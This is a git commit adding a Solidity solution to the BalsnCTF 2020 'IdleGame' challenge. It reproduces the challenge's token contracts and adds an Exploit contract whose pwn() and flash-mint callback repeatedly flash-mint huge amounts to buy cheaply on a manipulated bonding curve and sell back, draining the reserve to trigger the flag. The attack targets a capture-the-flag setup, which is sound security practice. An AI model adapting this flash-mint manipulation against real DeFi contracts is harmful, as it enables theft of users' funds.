Create Exploit.sol

aadityapurani · web-flow · commit d4e1433651f1 · 2020-11-15T23:44:43.000-08:00
diff --git a/2020/BalsnCTF/IdleGame/Exploit.sol b/2020/BalsnCTF/IdleGame/Exploit.sol
@@ -0,0 +1,363 @@
+pragma solidity =0.5.17;
+
+library SafeMath {
+    function add(uint a, uint b) internal pure returns (uint) {
+        uint c = a + b;
+        require(c >= a, "SafeMath: addition overflow");
+        return c;
+    }
+
+    function sub(uint a, uint b) internal pure returns (uint) {
+        return sub(a, b, "SafeMath: subtraction overflow");
+    }
+
+    function sub(uint a, uint b, string memory errorMessage) internal pure returns (uint) {
+        require(b <= a, errorMessage);
+        uint c = a - b;
+        return c;
+    }
+
+    function mul(uint a, uint b) internal pure returns (uint) {
+        if (a == 0) {
+            return 0;
+        }
+        uint c = a * b;
+        require(c / a == b, "SafeMath: multiplication overflow");
+        return c;
+    }
+
+    function div(uint a, uint b) internal pure returns (uint) {
+        return div(a, b, "SafeMath: division by zero");
+    }
+
+    function div(uint a, uint b, string memory errorMessage) internal pure returns (uint) {
+        require(b > 0, errorMessage);
+        uint c = a / b;
+        return c;
+    }
+}
+
+/**
+ * @dev Interface of the ERC20 standard as defined in the EIP.
+ * Modified from the original
+ * https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/token/ERC20/IERC20.sol
+ */
+interface IERC20 {
+    function totalSupply() external view returns (uint);
+    function balanceOf(address account) external view returns (uint);
+    function transfer(address recipient, uint amount) external returns (bool);
+    function allowance(address owner, address spender) external view returns (uint);
+    function approve(address spender, uint amount) external returns (bool);
+    function transferFrom(address sender, address recipient, uint amount) external returns (bool);
+    event Transfer(address indexed from, address indexed to, uint value);
+    event Approval(address indexed owner, address indexed spender, uint value);
+}
+
+/**
+ * @dev Implementation of the IERC20 interface.
+ * Modified from the original
+ * https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/token/ERC20/ERC20.sol
+ */
+contract ERC20 is IERC20 {
+    using SafeMath for uint;
+
+    string private _name;
+    string private _symbol;
+    uint8 private _decimals;
+    uint private _totalSupply;
+    mapping (address => uint) private _balances;
+    mapping (address => mapping (address => uint)) private _allowances;
+
+    constructor (string memory name, string memory symbol) public {
+        _name = name;
+        _symbol = symbol;
+        _decimals = 18;
+    }
+
+    function name() public view returns (string memory) {
+        return _name;
+    }
+
+    function symbol() public view returns (string memory) {
+        return _symbol;
+    }
+
+    function decimals() public view returns (uint8) {
+        return _decimals;
+    }
+
+    function totalSupply() public view returns (uint) {
+        return _totalSupply;
+    }
+
+    function balanceOf(address account) public view returns (uint) {
+        return _balances[account];
+    }
+
+    function transfer(address recipient, uint amount) public returns (bool) {
+        _transfer(msg.sender, recipient, amount);
+        return true;
+    }
+
+    function allowance(address owner, address spender) public view returns (uint) {
+        return _allowances[owner][spender];
+    }
+
+    function approve(address spender, uint amount) public returns (bool) {
+        _approve(msg.sender, spender, amount);
+        return true;
+    }
+
+    function transferFrom(address sender, address recipient, uint amount) public returns (bool) {
+        _transfer(sender, recipient, amount);
+        _approve(sender, msg.sender, _allowances[sender][msg.sender].sub(amount, "ERC20: transfer amount exceeds allowance"));
+        return true;
+    }
+
+    function increaseAllowance(address spender, uint addedValue) public returns (bool) {
+        _approve(msg.sender, spender, _allowances[msg.sender][spender].add(addedValue));
+        return true;
+    }
+
+    function decreaseAllowance(address spender, uint subtractedValue) public returns (bool) {
+        _approve(msg.sender, spender, _allowances[msg.sender][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
+        return true;
+    }
+
+    function _transfer(address sender, address recipient, uint amount) internal {
+        require(sender != address(0), "ERC20: transfer from the zero address");
+        require(recipient != address(0), "ERC20: transfer to the zero address");
+
+        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
+        _balances[recipient] = _balances[recipient].add(amount);
+        emit Transfer(sender, recipient, amount);
+    }
+
+    function _mint(address account, uint amount) internal {
+        require(account != address(0), "ERC20: mint to the zero address");
+
+        _totalSupply = _totalSupply.add(amount);
+        _balances[account] = _balances[account].add(amount);
+        emit Transfer(address(0), account, amount);
+    }
+
+    function _burn(address account, uint amount) internal {
+        require(account != address(0), "ERC20: burn from the zero address");
+
+        _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
+        _totalSupply = _totalSupply.sub(amount);
+        emit Transfer(account, address(0), amount);
+    }
+
+    function _approve(address owner, address spender, uint amount) internal {
+        require(owner != address(0), "ERC20: approve from the zero address");
+        require(spender != address(0), "ERC20: approve to the zero address");
+
+        _allowances[owner][spender] = amount;
+        emit Approval(owner, spender, amount);
+    }
+}
+
+/**
+ * @dev Modified from the original
+ * https://github.com/Austin-Williams/flash-mintable-tokens/blob/master/FlashERC20/FlashERC20.sol
+ */
+
+ // This is used for Flash Minting 
+interface IBorrower {
+    function executeOnFlashMint(uint amount) external;
+}
+
+contract FlashERC20 is ERC20 {
+    event FlashMint(address to, uint amount);
+
+    function flashMint(uint amount) external {
+        _mint(msg.sender, amount);
+        IBorrower(msg.sender).executeOnFlashMint(amount);
+        _burn(msg.sender, amount);
+        emit FlashMint(msg.sender, amount);
+    }
+}
+
+
+
+
+/**
+ * @dev Modified from the original
+ * https://github.com/yosriady/continuous-token/blob/master/contracts/token/ContinuousToken.sol
+ */
+interface BancorBondingCurve {
+    function calculatePurchaseReturn(uint _supply,  uint _reserveBalance, uint32 _reserveRatio, uint _depositAmount) external view returns (uint);
+    function calculateSaleReturn(uint _supply, uint _reserveBalance, uint32 _reserveRatio, uint _sellAmount) external view returns (uint);
+}
+
+contract ContinuousToken is ERC20 {
+    using SafeMath for uint;
+    // Bancor Bonding Curve itself is safe, I diff'ed it already
+    BancorBondingCurve public constant BBC = BancorBondingCurve(0xF88212805fE6e37181DE56440CF350817FF87130);
+    uint public scale = 10 ** 18;
+    uint public reserveBalance = 10 ** 15;
+    uint32 public reserveRatio;
+
+    event ContinuousMint(address sender, uint amount, uint deposit);
+    event ContinuousBurn(address sender, uint amount, uint reimbursement);
+
+    // We cannot buy nor sell ContinousToken unlike Eminence Contract
+    constructor(uint32 _reserveRatio) public {
+        reserveRatio = _reserveRatio;                                                   // 999000
+    }
+
+    function calculateContinuousMintReturn(uint _amount) public view returns (uint mintAmount) {
+        return BBC.calculatePurchaseReturn(totalSupply(), reserveBalance, reserveRatio, _amount);
+    }
+
+    function calculateContinuousBurnReturn(uint _amount) public view returns (uint burnAmount) {
+        return BBC.calculateSaleReturn(totalSupply(), reserveBalance, reserveRatio, _amount);
+    }
+
+    function _continuousMint(uint _deposit) internal returns (uint) {
+        require(_deposit > 0, "ContinuousToken: Deposit must be non-zero.");
+        uint amount = calculateContinuousMintReturn(_deposit);
+        reserveBalance = reserveBalance.add(_deposit);
+        emit ContinuousMint(msg.sender, amount, _deposit);
+        return amount;
+    }
+
+    function _continuousBurn(uint _amount) internal returns (uint) {
+        require(_amount > 0, "ContinuousToken: Amount must be non-zero.");
+        uint reimburseAmount = calculateContinuousBurnReturn(_amount);
+        reserveBalance = reserveBalance.sub(reimburseAmount);
+        emit ContinuousBurn(msg.sender, _amount, reimburseAmount);
+        return reimburseAmount;
+    }
+}
+
+ 
+contract BalsnToken is ERC20 {
+    uint randomNumber = 0;
+    address public owner;
+    
+    constructor(uint initialValue) public ERC20("BalsnToken", "BSN") {
+        owner = msg.sender;
+        _mint(msg.sender, initialValue);
+    }
+    
+    function giveMeMoney() public {                                         // It can provide us 1 BSN
+        require(balanceOf(msg.sender) == 0, "BalsnToken: you're too greedy");
+        _mint(msg.sender, 1);
+    }
+}
+
+contract IdleGame is FlashERC20, ContinuousToken {
+    uint randomNumber = 0;
+    address public owner;
+    BalsnToken public BSN;
+    mapping(address => uint) public startTime;
+    mapping(address => uint) public level;
+    
+    constructor (address BSNAddr, uint32 reserveRatio) public ContinuousToken(reserveRatio) ERC20("IdleGame", "IDL") {
+        owner = msg.sender;                                     // Deployer is the owner of the token
+        BSN = BalsnToken(BSNAddr);                              // IDL is dependent on BSN
+        _mint(msg.sender, 0x9453 * scale);                      // 37971 IDL Tokens
+    }
+    
+    function getReward() public returns (uint) {
+        uint points = block.timestamp.sub(startTime[msg.sender]);   // points will be same as timestamp
+        points = points.add(level[msg.sender]).mul(points);         // 
+        _mint(msg.sender, points);
+        startTime[msg.sender] = block.timestamp;
+        return points;
+    }
+    
+    function levelUp() public {
+        _burn(msg.sender, level[msg.sender]);
+        level[msg.sender] = level[msg.sender].add(1);
+    }
+    
+    // First function called by setup
+
+    function buyGamePoints(uint amount) public returns (uint) {
+        uint bought = _continuousMint(amount);                          // How much IDL will I get from BSN
+        BSN.transferFrom(msg.sender, address(this), amount);            // BSN coins can be converted to IDL 
+        _mint(msg.sender, bought);                                      // You will get IDL
+        return bought;
+    }
+    
+    function sellGamePoints(uint amount) public returns (uint) {        // Accepts Amount in IDL 
+        uint bought = _continuousBurn(amount);
+        _burn(msg.sender, amount);
+        BSN.transfer(msg.sender, bought);
+        return bought;
+    }
+    
+    function giveMeFlag() public {
+        _burn(msg.sender, (10 ** 8) * scale);
+        Setup(owner).giveMeFlag();
+    }
+}
+
+contract Setup {
+    uint randomNumber = 0;
+    bool public sendFlag = false;                                   // No flag for us while deploying
+    BalsnToken public BSN;
+    IdleGame public IDL;
+    
+    constructor() public {
+        uint initialValue = 15000000 * (10 ** 18);                 // 15,000,000 BSN 
+        BSN = new BalsnToken(initialValue);
+        IDL = new IdleGame(address(BSN), 999000);                   // ReserveRatio is 999000
+        BSN.approve(address(IDL), uint(-1));                        // BSN can be used to mint IDL tokens
+                                                                    //uint(-1) is infinity allowance
+        IDL.buyGamePoints(initialValue);
+    }
+    
+    function giveMeFlag() public {
+        require(msg.sender == address(IDL), "Setup: sender incorrect");
+        sendFlag = true;
+    }
+}
+
+contract Exploit {
+
+    address IDLAddress = 0xAAAAA; // Enter IDL of your deployed contract
+    address BSNAddress = 0xBBBBB; // Enter BSN of your deployed contract
+    uint public count;
+    uint myidl;
+    uint boo;
+    
+    IdleGame idl = IdleGame(address(IDLAddress));
+    BalsnToken bsn = BalsnToken(address(BSNAddress));
+    
+    function pwn() public {
+        bsn.approve(IDLAddress, uint(-1));
+        bsn.giveMeMoney();
+        
+        idl.flashMint(99056419041694676677800000000000000002);
+        boo = idl.sellGamePoints(myidl);
+        idl.flashMint(99056419041694676677800000000000000002);
+        boo = idl.sellGamePoints(myidl);
+        idl.flashMint(99056419041694676677800000000000000002);
+        boo = idl.sellGamePoints(myidl);
+        idl.flashMint(99056419041694676677800000000000000002);
+        idl.giveMeFlag();
+    
+    }
+    
+    function executeOnFlashMint(uint amount) external {
+        if (count == 0){
+            myidl = idl.buyGamePoints(1);   // or 10^-18 like 0.000000000000000001
+            count = count+1;
+        }else if (count == 1){
+            myidl = idl.buyGamePoints(boo);
+            count = count+1;
+        }else if (count ==2){
+            myidl = idl.buyGamePoints(boo);
+            count = count+1;
+        }else if (count ==3){
+            myidl = idl.buyGamePoints(boo);
+            count = count+1;
+        }
+    }
+
+
+}
